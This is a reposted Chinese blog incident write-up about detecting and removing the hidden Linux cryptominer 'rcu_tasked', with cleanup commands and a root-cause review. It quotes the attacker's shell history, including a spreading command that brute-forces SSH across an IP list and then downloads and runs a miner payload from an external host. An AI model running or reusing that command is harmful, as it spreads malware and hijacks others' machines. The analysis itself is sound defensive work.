首页 > 系统相关 >[转]查杀linux隐藏挖矿病毒rcu_tasked

[转]查杀linux隐藏挖矿病毒rcu_tasked

时间:2024-05-14 16:21:13浏览次数:26  
标签:cfg 查杀 tasked rcu rm 挖矿 病毒

记录一次项目中挖矿病毒的经历

这是黑客使用的批量蔓延病毒的工具,通过如下脚本

[root@Server .cfg]# cat /home/pischi/.bash_history
cd /root/
nvidia-smi;ls -a;cd .cfg;ls -a;wc -l ip
./key 20 -f ip pass 22 "nproc;nvidia-smi;rm -rf .cfg;mkdir .cfg;cd .cfg; wget 193.42.32.96/m.tar || curl -O vvnnmm.com/m.tar ; tar xvf m.tar || tar xvf m.tar.1 ; rm -rf m.tar*;chmod +x *;./dealer"

image

/root/.cfg/目录下的病毒源文件
image
目前未查清楚原文件是通过隐藏在什么程序中带过来的,这是一大遗憾

中毒现象

中毒现象提现未cpu占用100%,且通过top、netstat、ps等命令找不到进程号
image
挖矿的矿池IP,全是国外的IP,大概看了一下,基本是德国、芬兰、印度、美国等地区的
image
image

另外存在未知跟root权限一样高的用户“pischi”
image

解决方案

主要策略就是找到病毒,然后删除,如下是相关的命令

# 病毒清除

rcu_tasked,伪装挖矿程序清除

# 病毒通过这个文件实现隐藏进程ID,将里面的内容/usr/local/lib/libextrasshd.so删除即可
rm -f /etc/ld.so.preload 

rm -f /usr/local/lib/libextrasshd.so

rm -rf /root/.cfg/
rm -rf /usr/bin/mslog/
rm -f /usr/bin/player

找到rcu_tasked病毒进程
netstat -antp
ps -ef | grep rcu_tasked
kill -9 xxx

systemctl disable myservice
rm -f /lib/systemd/system/myservice.service

删除 pischi 用户
vipw

删除 pischi shadow
vipw -s

删除pischi用户目录
rm -rf /home/pischi/

删除定时任务
crontab -e
删除此行
@monthly /root/.cfg/./dealer  > /dev/null 2>&1 & disown

重启操作系统
reboot

复盘原因

前期项目比较着急,统一使用了一个跳板机,多人使用且均用了root用户,权限管控不到位,所有机器密码都一样,这期间可能密码泄露导致了此问题

参考文档
系统杀毒复盘
隐藏挖矿木马rcu_tasked的查杀
【安全】查杀linux上c3pool挖矿病毒xmrig
【安全】查杀linux挖矿病毒 kswapd0
【安全】查杀linux隐藏挖矿病毒rcu_tasked
【安全】挖矿木马自助清理手册

转载自:https://blog.csdn.net/UberSoldier/article/details/134039899

标签:cfg,查杀,tasked,rcu,rm,挖矿,病毒
From: https://www.cnblogs.com/masahiro/p/18191534

相关文章

  • 挖矿流量分析之Stratum挖矿协议
    目录前言区块链和挖矿相关概念挖矿木马挖矿协议StratumStratum工作过程前言之前做了一个关于“挖矿行为检测”的大创训练项目,在这里记录一下我关于挖矿检测相关内容的学习。区块链和挖矿相关概念区块链首先需要了解一些关于区块链的内容。注意,区块链和挖矿是两个紧密相关但又......
  • @EnableHystrix注解与@EnableCircuitBreaker的区别
    在学习服务降级中,发现了@EnableHystrix和@EnableCircuitBreaker的功能类似,研究后特此记录一下。查看@EnableHystrix的源码可以发现,它引用了@EnableCircuitBreaker,并对它进行了在封装。@Target({ElementType.TYPE})@Retention(RetentionPolicy.RUNTIME)@Document......
  • linux实战-挖矿
    简介应急响应工程师在内网服务器发现有台主机cpu占用过高,猜测可能是中了挖矿病毒,请溯源分析,提交对应的报告给应急小组虚拟机账号密码rootwebsecyjxyweb端口为80811、黑客的IP是?flag格式:flag{黑客的ip地址},如:flag{127.0.0.1}2、黑客攻陷网站的具体时间是?flag格式:flag......
  • 应急响应-webshell查杀
    简介靶机账号密码rootxjwebshell1.黑客webshell里面的flagflag{xxxxx-xxxx-xxxx-xxxx-xxxx}2.黑客使用的什么工具的shellgithub地址的md5flag{md5}3.黑客隐藏shell的完整路径的md5flag{md5}注:/xxx/xxx/xxx/xxx/xxx.xxx4.黑客免杀马完整路径md5flag步骤#1.1......
  • CircularQueue
    CircularQueue/*************************************************************filename:CircularQueueinterface*author:[email protected]*date:2024/04/23*function:MakegreatCVengineer*note......
  • 记一次“XMR门罗币挖矿木马病毒”处置
    一、背景概述故事的起因于26号下午做渗透测试时,登录跳板机发现CPU进程拉满到200%,qiao哥看了一眼直接说是XMR挖矿,这句话勾引起我的兴趣,由于应急是我的薄弱项也没有时间深入学习,所以有本篇应急分析文章。市面上存在很多关于XMR门罗币挖矿的教程,这些教程可能会被攻击者恶意利用来进......
  • linux挖矿病毒排查-实操
    一、优先排查netstat-ntpl//恶意连接排查cat/etc/passwd//异常账户排查cat/etc/shadowcat/etc/rc.d/rc.local/init.d等//开机启动项排查chkconfig--list//同等上面,为了全面可以使用此命令复查下crontab-l//计划任务排查cat/etc/hosts//hostst文件排查ca......
  • 如何提高Linux RCU实时性
    简介     LinuxRCU(Read-Copy-Update)是一种同步机制,用于提高多处理器系统中读取频繁且写入少的数据结构的性能。在实时系统中,响应时间和预测性是非常重要的。实时性意味着系统能够在严格的时间限制内完成任务。RCU通过减少锁的需求和允许并行读取操作,提高了系统的实时性......
  • 应急响应流程与挖矿病毒排查流程
    1.应急响应的流程1.1.为什么会有应急响应?在工作过程中,会遇到突发的情况,比如:DOS攻击,渗透攻击,病毒感染,需要立即将这些问题清除掉,恢复正常的生产秩序。这个过程就是应急响应。1.2.流程收集信息:收集客户的信息,以及遭遇情况的表现症状。判断类型:判断是否为安全事件,是哪......
  • 2024MathorCup数学建模思路A题B题C题D题思路汇总 妈妈杯建模思路分享
    文章目录1赛题思路2比赛日期和时间3组织机构4建模常见问题类型4.1分类问题4.2优化问题4.3预测问题4.4评价问题5建模资料1赛题思路(赛题出来以后第一时间在CSDN分享)https://blog.csdn.net/dc_sinor?type=blog2比赛日期和时间报名截止时间:2024年4月11......